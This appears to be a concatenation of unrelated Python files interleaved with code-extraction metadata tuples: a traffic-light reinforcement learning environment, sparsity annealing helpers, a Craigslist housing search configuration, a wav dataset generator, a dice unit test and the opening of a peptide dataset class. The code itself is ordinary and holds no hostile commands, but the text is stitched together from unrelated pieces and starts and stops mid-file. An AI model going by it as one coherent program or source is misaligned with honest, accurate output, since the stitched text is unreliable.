sys\n'), ((10450, 10464), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (10462, 10464), False, 'import sys\n'), ((1661, 1675), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1673, 1675), False, 'import sys\n'), ((1819, 1833), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1831, 1833), False, 'import sys\n'), ((1977, 1991), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (1989, 1991), False, 'import sys\n'), ((2135, 2149), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (2147, 2149), False, 'import sys\n'), ((2296, 2310), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (2308, 2310), False, 'import sys\n'), ((3200, 3214), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3212, 3214), False, 'import sys\n'), ((3358, 3372), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3370, 3372), False, 'import sys\n'), ((3516, 3530), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3528, 3530), False, 'import sys\n'), ((3674, 3688), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3686, 3688), False, 'import sys\n'), ((3835, 3849), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (3847, 3849), False, 'import sys\n'), ((4743, 4757), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (4755, 4757), False, 'import sys\n'), ((4901, 4915), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (4913, 4915), False, 'import sys\n'), ((5059, 5073), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5071, 5073), False, 'import sys\n'), ((5217, 5231), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5229, 5231), False, 'import sys\n'), ((5378, 5392), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5390, 5392), False, 'import sys\n'), ((6270, 6284), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6282, 6284), False, 'import sys\n'), ((6428, 6442), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6440, 6442), False, 'import sys\n'), ((6586, 6600), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6598, 6600), False, 'import sys\n'), ((6744, 6758), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6756, 6758), False, 'import sys\n'), ((6905, 6919), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (6917, 6919), False, 'import sys\n'), ((7800, 7814), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7812, 7814), False, 'import sys\n'), ((7958, 7972), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7970, 7972), False, 'import sys\n'), ((8116, 8130), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8128, 8130), False, 'import sys\n'), ((8274, 8288), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8286, 8288), False, 'import sys\n'), ((8435, 8449), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (8447, 8449), False, 'import sys\n')] |
from typing import List, overload
from flow.envs.multiagent.traffic_light_grid import MultiTrafficLightGridPOEnv
from flow.envs.traffic_light_grid import TrafficLightGridPOEnv
from gym.spaces import Box, Discrete
import numpy as np
ID_IDX = 1
class SeqTraffiLightEnv(TrafficLightGridPOEnv):
def __init__(self, env_params, sim_params, network, simulator):
super().__init__(env_params, sim_params, network, simulator=simulator)
# number of nearest lights to observe, defaults to 4
self.num_local_lights = env_params.additional_params.get(
"num_local_lights", 4)
# number of nearest edges to observe, defaults to 4
self.num_local_edges = env_params.additional_params.get(
"num_local_edges", 4)
@property
def observation_space(self):
"""State space that is partially observed.
Velocities, distance to intersections, edge number (for nearby
vehicles) from each direction, local edge information, and traffic
light state.
"""
tl_box = Box(
low=0.,
high=1,
shape=(
self.num_traffic_lights,
3 * 4 * self.num_observed +
2 * self.num_local_edges +
2 * (1 + self.num_local_lights),
),
dtype=np.float32)
return tl_box
def get_state(self):
"""Observations for each traffic light agent.
:return: dictionary which contains agent-wise observations as follows:
- For the self.num_observed number of vehicles closest and incoming
towards traffic light agent, gives the vehicle velocity, distance to
intersection, edge number.
- For edges in the network, gives the density and average velocity.
- For the self.num_local_lights number of nearest lights (itself
included), gives the traffic light information, including the last
change time, light direction (i.e. phase), and a currently_yellow flag.
"""
# Normalization factors
max_speed = max(
self.k.network.speed_limit(edge)
for edge in self.k.network.get_edge_list())
grid_array = self.net_params.additional_params["grid_array"]
max_dist = max(grid_array["short_length"], grid_array["long_length"],
grid_array["inner_length"])
# TODO(cathywu) refactor TrafficLightGridPOEnv with convenience
# methods for observations, but remember to flatten for single-agent
# Observed vehicle information
speeds = []
dist_to_intersec = []
edge_number = []
all_observed_ids = []
for _, edges in self.network.node_mapping:
local_speeds = []
local_dists_to_intersec = []
local_edge_numbers = []
for edge in edges:
observed_ids = \
self.get_closest_to_intersection(edge, self.num_observed)
all_observed_ids.append(observed_ids)
# check which edges we have so we can always pad in the right
# positions
local_speeds.extend(
[self.k.vehicle.get_speed(veh_id) / max_speed for veh_id in
observed_ids])
local_dists_to_intersec.extend([(self.k.network.edge_length(
self.k.vehicle.get_edge(
veh_id)) - self.k.vehicle.get_position(
veh_id)) / max_dist for veh_id in observed_ids])
local_edge_numbers.extend([self._convert_edge(
self.k.vehicle.get_edge(veh_id)) / (
self.k.network.network.num_edges - 1) for veh_id in
observed_ids])
if len(observed_ids) < self.num_observed:
diff = self.num_observed - len(observed_ids)
local_speeds.extend([1] * diff)
local_dists_to_intersec.extend([1] * diff)
local_edge_numbers.extend([0] * diff)
speeds.append(local_speeds)
dist_to_intersec.append(local_dists_to_intersec)
edge_number.append(local_edge_numbers)
# Edge information
density = []
velocity_avg = []
for edge in self.k.network.get_edge_list():
ids = self.k.vehicle.get_ids_by_edge(edge)
if len(ids) > 0:
# TODO(cathywu) Why is there a 5 here?
density += [5 * len(ids) / self.k.network.edge_length(edge)]
velocity_avg += [np.mean(
[self.k.vehicle.get_speed(veh_id) for veh_id in
ids]) / max_speed]
else:
density += [0]
velocity_avg += [0]
density = np.array(density)
velocity_avg = np.array(velocity_avg)
self.observed_ids = all_observed_ids
# Traffic light information
direction = self.direction.flatten()
currently_yellow = self.currently_yellow.flatten()
# This is a catch-all for when the relative_node method returns a -1
# (when there is no node in the direction sought). We add a last
# item to the lists here, which will serve as a default value.
# TODO(cathywu) are these values reasonable?
direction = np.append(direction, [0])
currently_yellow = np.append(currently_yellow, [1])
obs = []
# obs -> [num_light, observation]
node_to_edges = self.network.node_mapping
for rl_id in self.k.traffic_light.get_ids():
rl_id_num = int(rl_id.split("center")[ID_IDX])
local_edges = node_to_edges[rl_id_num][1]
local_edge_numbers = [self.k.network.get_edge_list().index(e)
for e in local_edges]
local_id_nums = [rl_id_num, self._get_relative_node(rl_id, "top"),
self._get_relative_node(rl_id, "bottom"),
self._get_relative_node(rl_id, "left"),
self._get_relative_node(rl_id, "right")]
observation = np.array(np.concatenate(
[speeds[rl_id_num], dist_to_intersec[rl_id_num],
edge_number[rl_id_num], density[local_edge_numbers],
velocity_avg[local_edge_numbers],
direction[local_id_nums], currently_yellow[local_id_nums]
]))
obs.append(observation)
return obs
| [
"numpy.append",
"numpy.array",
"numpy.concatenate",
"gym.spaces.Box"
] | [((1060, 1229), 'gym.spaces.Box', 'Box', ([], {'low': '(0.0)', 'high': '(1)', 'shape': '(self.num_traffic_lights, 3 * 4 * self.num_observed + 2 * self.\n num_local_edges + 2 * (1 + self.num_local_lights))', 'dtype': 'np.float32'}), '(low=0.0, high=1, shape=(self.num_traffic_lights, 3 * 4 * self.\n num_observed + 2 * self.num_local_edges + 2 * (1 + self.\n num_local_lights)), dtype=np.float32)\n', (1063, 1229), False, 'from gym.spaces import Box, Discrete\n'), ((4827, 4844), 'numpy.array', 'np.array', (['density'], {}), '(density)\n', (4835, 4844), True, 'import numpy as np\n'), ((4868, 4890), 'numpy.array', 'np.array', (['velocity_avg'], {}), '(velocity_avg)\n', (4876, 4890), True, 'import numpy as np\n'), ((5371, 5396), 'numpy.append', 'np.append', (['direction', '[0]'], {}), '(direction, [0])\n', (5380, 5396), True, 'import numpy as np\n'), ((5424, 5456), 'numpy.append', 'np.append', (['currently_yellow', '[1]'], {}), '(currently_yellow, [1])\n', (5433, 5456), True, 'import numpy as np\n'), ((6188, 6413), 'numpy.concatenate', 'np.concatenate', (['[speeds[rl_id_num], dist_to_intersec[rl_id_num], edge_number[rl_id_num],\n density[local_edge_numbers], velocity_avg[local_edge_numbers],\n direction[local_id_nums], currently_yellow[local_id_nums]]'], {}), '([speeds[rl_id_num], dist_to_intersec[rl_id_num], edge_number\n [rl_id_num], density[local_edge_numbers], velocity_avg[\n local_edge_numbers], direction[local_id_nums], currently_yellow[\n local_id_nums]])\n', (6202, 6413), True, 'import numpy as np\n')] |
import gin
import torch
import logging
from sparse_causal_model_learner_rl.metrics import find_value, find_key
@gin.configurable
def AnnealerThresholdSelector(config, config_object, epoch_info, temp,
adjust_every=100,
multiplier=10, # allow the loss to be 10 times bigger than the best
source_quality_key=None,
non_sparse_threshold_disable=None,
additive=True,
source_fit_loss_key='no_sparse_fit',
gin_variable='ThresholdAnnealer.fit_threshold',
**kwargs):
"""Adjust the fit threshold based on a non-sparse model's loss."""
try:
non_sparse_fit_loss = find_value(epoch_info, source_fit_loss_key)
logging.info(f"Threshold detector found non-sparse loss {non_sparse_fit_loss}")
except AssertionError as e:
return config
if 'last_hyper_adjustment' not in temp:
temp['last_hyper_adjustment'] = 0
i = epoch_info['epochs']
if additive:
temp['suggested_hyper'] = non_sparse_fit_loss + multiplier
else:
temp['suggested_hyper'] = non_sparse_fit_loss * multiplier
# disable annealing in case if target performance in terms of non-sparse loss is not reached
if non_sparse_threshold_disable is not None and non_sparse_fit_loss >= non_sparse_threshold_disable:
temp['suggested_hyper'] = 0.0
if temp.get('suggested_hyper', None) is not None and (i - temp['last_hyper_adjustment'] >= adjust_every):
with gin.unlock_config():
gin.bind_parameter(gin_variable, temp['suggested_hyper'])
temp['suggested_hyper'] = None
temp['last_hyper_adjustment'] = i
return config
@gin.configurable
def turn_on_features(m, ctx, logits_on=1.5, gap_threshold=1.1, loss_fcn=None):
"""Turn on features giving better loss."""
with torch.no_grad():
for fout in range(m.n_features + m.n_additional_features):
if fout >= m.n_features:
fout_add = fout - m.n_features
logits = getattr(m, m.additional_models[fout_add]).switch.logits
else:
logits = getattr(m, m.models[fout]).switch.logits
for fin in range(m.n_features):
orig_logits0, orig_logits1 = logits[0, fin].item(), logits[1, fin].item()
# trying 0...
logits[0, fin], logits[1, fin] = 5, -5
loss_0 = loss_fcn(**ctx)
if isinstance(loss_0, dict):
loss_0 = loss_0['loss']
loss_0 = loss_0.item()
# trying 1...
logits[0, fin], logits[1, fin] = -5, 5
loss_1 = loss_fcn(**ctx)
if isinstance(loss_1, dict):
loss_1 = loss_1['loss']
loss_1 = loss_1.item()
logits[0, fin], logits[1, fin] = orig_logits0, orig_logits1
loss_ratio = loss_0 / loss_1
if loss_ratio > gap_threshold:
logging.info(f'Turn on feature {fout} <- {fin}')
logits[0, fin], logits[1, fin] = -logits_on, logits_on
@gin.configurable
def ModelResetter(config, epoch_info, temp,
learner=None,
gin_annealer_cls='ThresholdAnnealer',
trainables=None,
reset_weights=True,
reset_logits=True,
reset_optimizers=False,
grace_epochs=2000, # give that many epochs to try to recover on its own
last_context=None,
reset_turn_on=False,
new_logits=0.0, **kwargs):
source_metric_key = gin.query_parameter(f"{gin_annealer_cls}.source_metric_key")
try:
fit_loss = find_value(epoch_info, source_metric_key)
# logging.warning("Cannot find loss with sparsity, defaulting to fit loss")
except AssertionError as e:
return config
if 'first_not_good' not in temp:
temp['first_not_good'] = None
fit_threshold = gin.query_parameter(f"{gin_annealer_cls}.fit_threshold")
is_good = fit_loss <= fit_threshold
i = epoch_info['epochs']
logging.info(f"Resetter found loss {fit_loss} threshold {fit_threshold}, good {is_good} epoch {i} fng {temp['first_not_good']}")
if is_good:
temp['first_not_good'] = None
elif temp['first_not_good'] is None:
temp['first_not_good'] = i
elif i - temp['first_not_good'] >= grace_epochs:
if reset_weights:
for key, param in trainables.get('model').named_parameters():
if 'switch' not in key:
logging.info(f'Resetting parameter {key}')
if 'bias' in key:
torch.nn.init.zeros_(param)
else:
torch.nn.init.xavier_uniform_(param)
if reset_logits:
for p in trainables.get('model').switch__params:
logging.info(f"Resetting switch parameter with shape {p.data.shape}")
p_orig = p.data.detach().clone()
p.data[1, p_orig[1] < -new_logits] = -new_logits
p.data[0, p_orig[1] < -new_logits] = new_logits
if reset_optimizers:
learner.create_optimizers()
if reset_turn_on:
turn_on_features(m=learner.model, ctx=last_context)
temp['first_not_good'] = None
@gin.configurable
def ThresholdAnnealer(config, epoch_info, temp,
fit_threshold=1e-2,
min_hyper=1e-5,
learner=None,
max_hyper=100,
freeze_time=100,
freeze_threshold_probas=0.8,
adjust_every=100,
reset_on_fail=False,
source_metric_key='with_sparse_fit',
factor=0.5, # if cool/warm not specified, use this one for both
factor_cool=None, # when increasing the coefficient (regularization -> cooling)
factor_heat=None, # when decreasing the coefficient (no reg -> warming)
emergency_heating=False,
**kwargs):
"""Increase sparsity if fit loss is low, decrease otherwise."""
try:
fit_loss = find_value(epoch_info, source_metric_key)
# logging.warning("Cannot find loss with sparsity, defaulting to fit loss")
logging.info(f"Annealer found loss {fit_loss} {source_metric_key}")
except AssertionError as e:
#logging.warning(f"Annealer source metric not found: {source_metric_key}, {e}")
return config
# fit_loss = find_value(epoch_info, '/fit/value')
if factor_cool is None:
factor_cool = factor
if factor_heat is None:
factor_heat = factor
need_heating = False
if 'last_hyper_adjustment' not in temp:
temp['last_hyper_adjustment'] = 0
i = epoch_info['epochs']
if temp.get('last_freeze_start', -1) >= 0:
if i - temp.get('last_freeze_start') >= freeze_time:
logging.warning(f"Freezing finished at {i}!")
del temp['last_freeze_start']
else:
if freeze_threshold_probas is not None:
p = learner.model.model.switch.probas
p.data[p.data > freeze_threshold_probas] = freeze_threshold_probas
return config
if fit_loss > fit_threshold: # FREE ENERGY (loss) IS HIGH -> NEED WARMING (decrease regul coeff)
if reset_on_fail:
temp['suggested_hyper'] = min_hyper
else:
if config['losses']['sparsity']['coeff'] > min_hyper:
temp['suggested_hyper'] = config['losses']['sparsity']['coeff'] * factor_heat
need_heating = True
temp['suggested_hyper'] = max(min_hyper, temp['suggested_hyper'])
else: # FREE ENRGY (loss) is low -> CAN DO COOLING (increase regul coeff)
if config['losses']['sparsity']['coeff'] < max_hyper:
temp['suggested_hyper'] = config['losses']['sparsity']['coeff'] / factor_cool
temp['suggested_hyper'] = min(max_hyper, temp['suggested_hyper'])
epochs_enough = (i - temp['last_hyper_adjustment'] >= adjust_every)
if emergency_heating and need_heating:
epochs_enough = True
if temp.get('suggested_hyper', None) is not None and epochs_enough:
if temp['suggested_hyper'] < config['losses']['sparsity']['coeff']:
direction = 'heat'
elif temp['suggested_hyper'] > config['losses']['sparsity']['coeff']:
direction = 'cool'
else:
direction = 'same'
# if were cooling down but now have to warm...
# freezing the model for some time
if 'last_direction' in temp and temp['last_direction'] in ['cool', 'same'] and direction == 'heat':
temp['last_freeze_start'] = i
logging.warning(f"Starting model freeze at {i}")
temp['last_direction'] = direction
config['losses']['sparsity']['coeff'] = temp['suggested_hyper']
temp['suggested_hyper'] = None
temp['last_hyper_adjustment'] = i
return config
@gin.configurable
def threshold_annealer_threshold(**kwargs):
return gin.query_parameter('ThresholdAnnealer.fit_threshold')
| [
"sparse_causal_model_learner_rl.metrics.find_value",
"torch.nn.init.xavier_uniform_",
"gin.bind_parameter",
"gin.query_parameter",
"logging.warning",
"torch.nn.init.zeros_",
"gin.unlock_config",
"torch.no_grad",
"logging.info"
] | [((3912, 3972), 'gin.query_parameter', 'gin.query_parameter', (['f"""{gin_annealer_cls}.source_metric_key"""'], {}), "(f'{gin_annealer_cls}.source_metric_key')\n", (3931, 3972), False, 'import gin\n'), ((4290, 4346), 'gin.query_parameter', 'gin.query_parameter', (['f"""{gin_annealer_cls}.fit_threshold"""'], {}), "(f'{gin_annealer_cls}.fit_threshold')\n", (4309, 4346), False, 'import gin\n'), ((4425, 4563), 'logging.info', 'logging.info', (['f"""Resetter found loss {fit_loss} threshold {fit_threshold}, good {is_good} epoch {i} fng {temp[\'first_not_good\']}"""'], {}), '(\n f"Resetter found loss {fit_loss} threshold {fit_threshold}, good {is_good} epoch {i} fng {temp[\'first_not_good\']}"\n )\n', (4437, 4563), False, 'import logging\n'), ((9679, 9733), 'gin.query_parameter', 'gin.query_parameter', (['"""ThresholdAnnealer.fit_threshold"""'], {}), "('ThresholdAnnealer.fit_threshold')\n", (9698, 9733), False, 'import gin\n'), ((829, 872), 'sparse_causal_model_learner_rl.metrics.find_value', 'find_value', (['epoch_info', 'source_fit_loss_key'], {}), '(epoch_info, source_fit_loss_key)\n', (839, 872), False, 'from sparse_causal_model_learner_rl.metrics import find_value, find_key\n'), ((882, 961), 'logging.info', 'logging.info', (['f"""Threshold detector found non-sparse loss {non_sparse_fit_loss}"""'], {}), "(f'Threshold detector found non-sparse loss {non_sparse_fit_loss}')\n", (894, 961), False, 'import logging\n'), ((2030, 2045), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2043, 2045), False, 'import torch\n'), ((4005, 4046), 'sparse_causal_model_learner_rl.metrics.find_value', 'find_value', (['epoch_info', 'source_metric_key'], {}), '(epoch_info, source_metric_key)\n', (4015, 4046), False, 'from sparse_causal_model_learner_rl.metrics import find_value, find_key\n'), ((6654, 6695), 'sparse_causal_model_learner_rl.metrics.find_value', 'find_value', (['epoch_info', 'source_metric_key'], {}), '(epoch_info, source_metric_key)\n', (6664, 6695), False, 'from sparse_causal_model_learner_rl.metrics import find_value, find_key\n'), ((6790, 6857), 'logging.info', 'logging.info', (['f"""Annealer found loss {fit_loss} {source_metric_key}"""'], {}), "(f'Annealer found loss {fit_loss} {source_metric_key}')\n", (6802, 6857), False, 'import logging\n'), ((1677, 1696), 'gin.unlock_config', 'gin.unlock_config', ([], {}), '()\n', (1694, 1696), False, 'import gin\n'), ((1711, 1768), 'gin.bind_parameter', 'gin.bind_parameter', (['gin_variable', "temp['suggested_hyper']"], {}), "(gin_variable, temp['suggested_hyper'])\n", (1729, 1768), False, 'import gin\n'), ((7455, 7500), 'logging.warning', 'logging.warning', (['f"""Freezing finished at {i}!"""'], {}), "(f'Freezing finished at {i}!')\n", (7470, 7500), False, 'import logging\n'), ((9327, 9375), 'logging.warning', 'logging.warning', (['f"""Starting model freeze at {i}"""'], {}), "(f'Starting model freeze at {i}')\n", (9342, 9375), False, 'import logging\n'), ((3231, 3279), 'logging.info', 'logging.info', (['f"""Turn on feature {fout} <- {fin}"""'], {}), "(f'Turn on feature {fout} <- {fin}')\n", (3243, 3279), False, 'import logging\n'), ((5239, 5308), 'logging.info', 'logging.info', (['f"""Resetting switch parameter with shape {p.data.shape}"""'], {}), "(f'Resetting switch parameter with shape {p.data.shape}')\n", (5251, 5308), False, 'import logging\n'), ((4908, 4950), 'logging.info', 'logging.info', (['f"""Resetting parameter {key}"""'], {}), "(f'Resetting parameter {key}')\n", (4920, 4950), False, 'import logging\n'), ((5015, 5042), 'torch.nn.init.zeros_', 'torch.nn.init.zeros_', (['param'], {}), '(param)\n', (5035, 5042), False, 'import torch\n'), ((5095, 5131), 'torch.nn.init.xavier_uniform_', 'torch.nn.init.xavier_uniform_', (['param'], {}), '(param)\n', (5124, 5131), False, 'import torch\n')] |
import os
# filters
FILTERS = {
'min_bathrooms': 1,
'min_bedrooms': 3
}
## Location preferences
# The Craigslist site you want to search on.
# For instance, https://sfbay.craigslist.org is SF and the Bay Area.
# You only need the beginning of the URL.
CRAIGSLIST_SITE = 'sfbay'
# What Craigslist subdirectories to search on.
# For instance, https://sfbay.craigslist.org/eby/ is the East Bay, and https://sfbay.craigslist.org/sfc/ is San Francisco.
# You only need the last three letters of the URLs.
AREAS = ["sfc"]
# A list of neighborhoods and coordinates that you want to look for apartments in. Any listing that has coordinates
# attached will be checked to see which area it is in. If there's a match, it will be annotated with the area
# name. If no match, the neighborhood field, which is a string, will be checked to see if it matches
# anything in NEIGHBORHOODS.
BOXES = {
"mission": [
[37.747808, -122.429121],
[37.772749, -122.407797]
]
}
# A list of neighborhood names to look for in the Craigslist neighborhood name field. If a listing doesn't fall into
# one of the boxes you defined, it will be checked to see if the neighborhood name it was listed under matches one
# of these. This is less accurate than the boxes, because it relies on the owner to set the right neighborhood,
# but it also catches listings that don't have coordinates (many listings are missing this info).
NEIGHBORHOODS = ["berkeley north", "berkeley", "rockridge", "adams point", "oakland lake merritt", "cow hollow", "piedmont", "pac hts", "pacific heights", "lower haight", "inner sunset", "outer sunset", "presidio", "palo alto", "richmond / seacliff", "haight ashbury", "alameda", "twin peaks", "noe valley", "bernal heights", "glen park", "sunset", "mission district", "potrero hill", "dogpatch"]
## Transit preferences
# The farthest you want to live from a transit stop.
MAX_TRANSIT_DIST = 2 # kilometers
# Transit stations you want to check against. Every coordinate here will be checked against each listing,
# and the closest station name will be added to the result and posted into Slack.
GOOGLE_STOPS = {
"<NAME> @ Union": [37.798656,-122.424156],
"<NAME> @ Sacramento": [37.791363,-122.422707],
"Columbus @ Powell": [37.800591,-122.410721],
"San Francisco Office": [37.791172,-122.389923],
"Soma": [37.777119,-122.395134],
"Civic Center": [37.778316,-122.414398],
"Stanyan @ Frederick": [37.766594,-122.45295],
"Haight @ Divisadero": [37.771225,-122.436745],
"Hayes @ Steiner": [37.775612,-122.432495],
"24th @ Castro": [37.75124,-122.433762],
"24th @ Church": [37.751598,-122.427704],
"30th @ Dolores": [37.742188,-122.424614],
"18th & Dolores": [37.76125,-122.42585],
"24th @ Valencia": [37.752033,-122.420387],
"Park Presido @ Geary": [37.780266,-122.47245],
"19th @ Kirkham": [37.759975,-122.476974],
"19th @ Taraval": [37.743191,-122.475822],
"<NAME> BART": [37.733131,-122.434143],
"San Francisco Office Pickup": [37.789299,-122.388672],
"Valencia @ 24th": [37.751945,-122.420769],
"14th and Market (Late AM Quad, Sweep, & Evening Drop Off)": [37.768764,-122.427574],
"18th & Castro": [37.760788,-122.434914],
"201 Toland Street": [37.745743,-122.397133],
"18th & Dolores": [37.761444,-122.426628],
"Jackson Playground": [37.765011,-122.399948],
"Potrero & 18th": [37.761635,-122.407318],
"Potrero & 23rd": [37.753986,-122.406586],
"Lombard @ Pierce": [37.799282,-122.439499],
"Market @ Dolores": [37.768872,-122.427169]
}
FB_STOPS = {
"SOMA-1": [37.785083,-122.419667],
"SOMA-2": [37.778306,-122.414389],
"SOMA-3": [37.778056,-122.397056],
"SOMA-4": [37.774417,-122.404444],
"Mission-1": [37.76427,-122.430571],
"Mission-2": [37.748643,-122.420834],
"Mission-3": [37.748095,-122.418281],
"Mission-4": [37.751702,-122.427492],
"Mission-5": [37.765028,-122.419278],
"Hayes Valley-1": [37.773118,-122.44628],
"Hayes Valley-2": [37.777639,-122.42325],
"Hayes Valley-3": [37.773778,-122.432083],
"Hayes Valley-4": [37.780352,-122.438784],
"Hayes Valley-5": [37.784972,-122.424667],
"Portero-1": [37.765028,-122.399861],
"Portero-2": [37.761889,-122.41025],
"Portero-3": [37.755722,-122.409528]
}
## Search type preferences
# The Craigslist section underneath housing that you want to search in.
# For instance, https://sfbay.craigslist.org/search/apa find apartments for rent.
# https://sfbay.craigslist.org/search/sub finds sublets.
# You only need the last 3 letters of the URLs.
CRAIGSLIST_HOUSING_SECTION = 'sub'
## System settings
# How long we should sleep between scrapes of Craigslist.
# Too fast may get rate limited.
# Too slow may miss listings.
SLEEP_INTERVAL = 20 * 60 # 20 minutes
# Which slack channel to post the listings into.
SLACK_CHANNEL = "#housing"
# The token that allows us to connect to slack.
# Should be put in private.py, or set as an environment variable.
SLACK_TOKEN = os.getenv('SLACK_TOKEN', "")
# Any private settings are imported here.
OFFICE_ADDRESS = '1965 Charleston Road Mountain View, CA 94043';
try:
from private import *
except Exception:
pass
# Any external private settings are imported from here.
try:
from config.private import *
except Exception:
pass | [
"os.getenv"
] | [((5037, 5065), 'os.getenv', 'os.getenv', (['"""SLACK_TOKEN"""', '""""""'], {}), "('SLACK_TOKEN', '')\n", (5046, 5065), False, 'import os\n')] |
import os
import scipy.io.wavfile
import matplotlib.pyplot as plt
import numpy as np
import os
import random
'''
Create a random dataset with three different frequencies that are always in fase.
Frequencies will be octave [440, 880, 1320].
'''
fs = 16000
x1 = scipy.io.wavfile.read('corpus/Analysis/a440.wav')[1]
x2 = scipy.io.wavfile.read('corpus/Analysis/c531.wav')[1]
x3 = scipy.io.wavfile.read('corpus/Analysis/e667.wav')[1]
x4 = scipy.io.wavfile.read('corpus/Analysis/a880.wav')[1]
x5 = scipy.io.wavfile.read('corpus/Analysis/c1056.wav')[1]
x6 = scipy.io.wavfile.read('corpus/Analysis/e1320.wav')[1]
x7 = scipy.io.wavfile.read('corpus/Analysis/a1760.wav')[1]
# Categories
a = [0]
b = [1]
c = [2]
def createRandomSequence():
# sequence length
sq_length = random.randint(5, 10)
#create sequence
sequence = []
sampleSequence = []
minLen = 1818
for i in range(0, sq_length):
value = random.randint(0,6)
sequence.append(value)
#create lengths per value
lenValue = minLen * random.randint(1,10)
sampleSequence.append(lenValue)
return sequence, sampleSequence
def genFile(sequence, sampleSequence, c):
newSequence = []
fullSequence = []
for i in range(len(sequence)):
newSequence = int(sampleSequence[i]) * [sequence[i]]
fullSequence = fullSequence + newSequence
file00 = open(os.path.join('corpus', 'panFluteBigDataset', 'lc_train%s.txt' % c), 'w')
for item in fullSequence:
file00.write('%i,\n' % item)
file00.close()
def case(x):
return {
0: x1,
1: x2,
2: x3,
3: x4,
4: x5,
5: x6,
6: x7
}[x]
def genSignals(sequence, sampleSequence, c):
y=[]
for i in range(len(sequence)):
# convert categories to frequencies
freq = case(sequence[i])
#nSamples = np.arange(sampleSequence[i])
#a = random.randint(25, 100)/100
a = 1
#y0 = a*np.sin(2*np.pi*freq*nSamples / fs)
y0= freq[:sampleSequence[i]]
y = scipy.hstack((y, y0))
y = y / y[np.argmax(y)]
noise = 0.01*np.random.normal(0, 1, len(y))
y = np.asarray(y) + noise
scipy.io.wavfile.write(os.path.join('corpus', 'panFluteBigDataset7freq', 'lc_train%s.wav' % c), fs, y)
def main():
for c in range(0,100):
sequence, sampleSequence = createRandomSequence()
#print(sequence, sampleSequence)
#genFile(sequence, sampleSequence, c)
genSignals(sequence, sampleSequence, c)
if __name__ == '__main__':
main()
| [
"numpy.argmax",
"numpy.asarray",
"os.path.join",
"random.randint"
] | [((773, 794), 'random.randint', 'random.randint', (['(5)', '(10)'], {}), '(5, 10)\n', (787, 794), False, 'import random\n'), ((926, 946), 'random.randint', 'random.randint', (['(0)', '(6)'], {}), '(0, 6)\n', (940, 946), False, 'import random\n'), ((1389, 1455), 'os.path.join', 'os.path.join', (['"""corpus"""', '"""panFluteBigDataset"""', "('lc_train%s.txt' % c)"], {}), "('corpus', 'panFluteBigDataset', 'lc_train%s.txt' % c)\n", (1401, 1455), False, 'import os\n'), ((2167, 2180), 'numpy.asarray', 'np.asarray', (['y'], {}), '(y)\n', (2177, 2180), True, 'import numpy as np\n'), ((2216, 2287), 'os.path.join', 'os.path.join', (['"""corpus"""', '"""panFluteBigDataset7freq"""', "('lc_train%s.wav' % c)"], {}), "('corpus', 'panFluteBigDataset7freq', 'lc_train%s.wav' % c)\n", (2228, 2287), False, 'import os\n'), ((1039, 1060), 'random.randint', 'random.randint', (['(1)', '(10)'], {}), '(1, 10)\n', (1053, 1060), False, 'import random\n'), ((2097, 2109), 'numpy.argmax', 'np.argmax', (['y'], {}), '(y)\n', (2106, 2109), True, 'import numpy as np\n')] |
import unittest
import game.engine.dice as dice
class DiceRollTest(unittest.TestCase):
def test_dice_roll(self):
roll = dice.roll()
self.assertGreaterEqual(roll, 1)
self.assertLessEqual(roll, 6)
| [
"game.engine.dice.roll"
] | [((134, 145), 'game.engine.dice.roll', 'dice.roll', ([], {}), '()\n', (143, 145), True, 'import game.engine.dice as dice\n')] |
""" This module contains a pytorch dataset for learning peptide embeddings.
In particular, each "instance" of the dataset comprises two peptide sequences,
as well as the sNebula similarity between them. The sNebula distance reflects
the BLOSSUM similarity transformed from 0 to 1.
"""
import logging
logger = logging.getLogger(__name__)
import numpy as np
import torch
import torch.utils.data
from lifesci.peptide_dataset import PeptideDataset
import lifesci.sequence_similarity_utils as sequence_similarity_utils
import pyllars.string_utils as string_utils
from typing import NamedTuple, Optional
class PeptideEncoderTrainingDatasetItem(NamedTuple):
aa_sequence_xs: str
aa_sequence_ys: str
encoded_xs: torch.IntTensor
encoded_ys: torch.IntTensor
similarities: torch.FloatTensor
_DEFAULT_SEQUENCE_COLUMN = 'sequence'
_DEFAULT_SEED = 8675309
_DEFAULT_NAME = "PeptideEncoderTrainingDataset"
_DEFAULT_MAX_LEN = 25
class PeptideEncoderTrainingDataset(torch.utils.data.Dataset):
""" Generate training samples from a list of amino acid sequences
In particular, this class reads a list of peptides from `dataset_path`. It
then draws pairs of peptides from the list and calculates the sNebula
similarity score between them. Thus, each item from this dataset consists
of two peptide sequences and the similarity score.
In case the dataset object should be used for validation, the
`is_validation` flag can be set to `True`. In that case, a fixed set of
pairings will be selected for the peptides so that performance metrics are
constant from iteration to iteration. Otherwise (i.e., for training), one
member of each pair is randomly sampled.
Parameters
----------
dataset_path : str
The path to the dataset. It should be compatible with `pandas.read_csv`
and contain a column named `sequence_column` which includes the
sequences. Other columns are ignored.
aa_encoding_map : pyllars.string_utils.encoding_map_type
A mapping from each amino acid to its integer index.
N.B. This should **not** be a one-hot representation, but, as stated,
